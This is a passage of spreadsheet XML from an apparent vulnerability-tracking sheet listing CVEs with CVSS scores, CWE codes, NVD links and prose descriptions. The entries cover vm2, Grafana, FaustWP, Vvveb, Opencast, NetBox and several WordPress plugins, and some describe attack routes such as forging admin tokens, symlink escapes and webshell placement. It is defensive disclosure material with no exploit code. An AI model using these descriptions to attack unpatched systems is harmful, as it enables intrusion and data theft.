          <t>vm2 versions 3.11.4 through 3.11.6 incompletely filter Node.js registered internal symbols across the sandbox boundary. The extraction filters in lib/setup-sandbox.js and the cross-realm symbol checks and write traps in lib/bridge.js use a fixed list of known dangerous registered symbols that omits nodejs.stream.disturbed and nodejs.stream.errored, which are exposed on host WebStream prototypes on newer Node.js releases (validated on Node.js v25.8.0). When the embedder exposes a host WebStream object and the host stream/web module to the sandbox, sandbox code can obtain the real host symbols via Object.getOwnPropertySymbols(streamWeb.ReadableStream.prototype) and use them as write keys on host stream objects, corrupting host-visible stream state — for example making stream.Readable.isDisturbed() return false for an already-consumed stream. This can bypass host logic that relies on Node's public stream-state helpers to enforce one-shot body consumption, reject errored streams, or decide whether a stream is safe to hand to another component. It is not a host code-execution primitive in the reported proof of vulnerability. This is an incomplete fix for the earlier nodejs.* symbol filtering issue. Fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92952</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14850</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-640</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>The password reset funcionality is vulnerable to unauthorized account modification due to improper validation of the user_id parameter. An attacker can manipulate this predictable numeric identifier to reset passwords for arbitrary users without proving account ownership.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14850</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15815</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>security@grafana.com</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59, CWE-94</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>Grafana OSS and Grafana Enterprise did not safely resolve symbolic links when
extracting plugin archives. A crafted plugin archive can chain relative symbolic link
entries to escape the plugin installation directory, writing arbitrary files and an
executable backend binary outside that directory. The dropped executable runs with the
privileges of the Grafana server process, resulting in remote code execution.
Plugin archives are extracted before their signature is verified, so a valid plugin
signature does not prevent the write. An operator can therefore be affected by
installing a plugin that appears legitimate, as well as by installing a plugin from an
arbitrary archive using grafana-cli, the GF_INSTALL_PLUGINS environment variable, or
preinstall configuration.
Grafana Enterprise is affected because it includes the same plugin extraction code as
Grafana OSS.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15815</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25283</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when copying unverified data from an external source exceeds the allocated buffer size.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25283</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28326</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>psirt@solarwinds.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>SolarWinds Access Rights Manager was reported to be affected by an unauthenticated remote code execution vulnerability. The issue stems from a hardcoded static key.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28326</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54239</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-639</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>Faust.js is a headless WordPress toolkit. Prior to 1.8.11, the FaustWP WordPress plugin authenticates only the ciphertext in its token envelope and excludes the 16-byte initialization vector from the HMAC in WPE\FaustWP\Auth\encrypt() and WPE\FaustWP\Auth\decrypt() in plugins/faustwp/includes/auth/functions.php. A logged-in non-administrator who obtains an authorization code from GET /generate can modify the unauthenticated initialization vector so that CBC decryption changes the token type and user identifier while the HMAC remains valid. This can produce an access token for an Administrator and permit full WordPress REST API access, administrator-account creation, plugin installation, and arbitrary code execution. This issue is fixed in repository version 1.8.11.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54239</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54504</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-668</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>MCP Documentation Server is a local-first document management and semantic search server for AI coding agents. From 1.13.0 until 1.13.1, the automatically started Web UI in src/server.ts calls startWebServer in src/web-server.ts with START_WEB_UI enabled by default and WEB_PORT set to 3080. startWebServer uses app.listen(PORT) without a host, which binds the unauthenticated document-management API to all interfaces rather than localhost. A network-reachable client can invoke GET /api/documents, GET /api/documents/:id, POST /api/documents, POST /api/search-all, DELETE /api/documents/:id, and GET /api/config without credentials to enumerate and read documents, search the corpus, insert or delete documents, and tamper with the MCP assistant's knowledge base. The service must be reachable from the attacker's LAN, VM network, container bridge, VPN, or another routed network, and the issue does not provide remote code execution. This issue is fixed in 1.13.1.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54504</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54519</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>AI Agent Automation is a modular AI agent workflow automation platform with schedulers, tools, and observability. Prior to 0.9.1, backend/src/controllers/memory.controller.js authenticates requests but listMemories, deleteMemory, and clearAgentMemory use a caller-supplied agentId or memory _id without verifying through the related Agent that the record belongs to req.user. An authenticated attacker who knows or obtains another user's identifiers can read victim AgentMemory content, including conversation history, agent context, task data, embeddings, and metadata, delete an individual victim memory, or clear all memory belonging to a victim agent. This breaks tenant isolation and causes unauthorized disclosure and data loss. This issue is fixed in version 0.9.1.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54519</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54612</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-94</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. From 1.0.0 until 1.0.8.5, saveGlobalElements() in admin/controller/editor/global-trait.php concatenates the attacker-controlled file portion of data-v-save-global to the active theme directory before loadHTMLFile() and file_put_contents() operate on it. An authenticated user with the default Editor role and editor/* permission can submit crafted HTML to module=editor/editor&amp;action=save and traverse to an existing writable PHP file outside the theme directory. If the target is web-accessible, editor-controlled PHP content executes in the web server context; a shipped public/vadmin/index.php entrypoint can be used as an execution trampoline rather than requiring a test-only file. This can permit persistent webshell placement and compromise application confidentiality, integrity, and availability. This issue is fixed in version 1.0.8.5.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54612</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54671</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>WeGIA is a web manager for charitable institutions. Prior to 3.8.5, WeGIA maps InternoControle to an empty resource array in web/controle/control.php, and verificarPermissao in web/dao/MiddlewareDAO.php treats that empty array as unconditional access for every authenticated user. The methods in web/controle/InternoControle.php, including listarUm, alterar, and excluir, accept user-controlled id or idInterno values without verifying ownership, allowing a low-privileged user to read, modify, or delete another person's records and expose personal, identity, address, medical, and family information. The advisory notes that a self-referencing load bug can crash this controller in the reported revision, but the empty-resource authorization pattern and affected methods remain the vulnerability under review. This issue is fixed in version 3.8.5.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54671</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54916</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-427, CWE-829</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>NetBox Device Type Library is a collection of community-sourced device type definitions for import into NetBox. The absence of tests/init.py and the lack of --import-mode=importlib cause pytest prepend import mode to place the tests directory at the front of sys.path during collection. An unauthenticated contributor can add a module such as tests/git.py that shadows GitPython when tests/definitions_test.py executes from git import Git, Repo, or add tests/conftest.py for automatic collection-time execution. Python imports and runs the pull-request module before any test function, allowing arbitrary code execution on the GitHub Actions runner, test-result tampering, and access to tokens or network resources exposed to the workflow. This module-shadowing path is independent of the earlier pickle deserialization flaw and the separately tracked NETBOX_DT_LIBRARY_URL issue. This vulnerability is fixed by commit b0d9a3dadd0a0a9d3c93b0b2777559fd4bad1037.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54916</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77614</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>Opencast is a free, open-source platform to support the management of educational audio and video content. Prior to versions 19.7 and 20.2, the default security configuration in etc/security/mh_default_org.xml accepts a client-selected JSESSIONID from the ;jsessionid= URL path parameter and does not replace it when the victim logs in. An unauthenticated attacker can send a crafted link to a victim whose browser has no active Opencast session cookie, wait for the victim to authenticate, and then reuse the known identifier as the victim's authenticated session. This can expose the victim's data and actions and can produce full administrative account takeover when the victim is an administrator. This issue is fixed in versions 19.7 and 20.2.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77614</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78295</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in Xagio SEO &lt;= 7.1.0.43 versions.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78295</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85130</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>The WPLP Cookie Consent  WordPress plugin before 4.4.4 does not escape a value submitted through a public endpoint for the JavaScript context it is later output in on an administrative screen, allowing unauthenticated users to run arbitrary JavaScript in the session of an administrator who interacts with the logged entry. Only multisite installations are affected.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85130</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86801</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>The To Do List Member WordPress plugin from 1.4 through 1.6 ships a file upload endpoint that does not load WordPress and therefore applies no authentication, capability or nonce check of any kind, and validates only the name of an uploaded file rather than its content, allowing unauthenticated users to store active content served from the site's own origin, and to list and delete the files already staged there.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86801</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87786</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
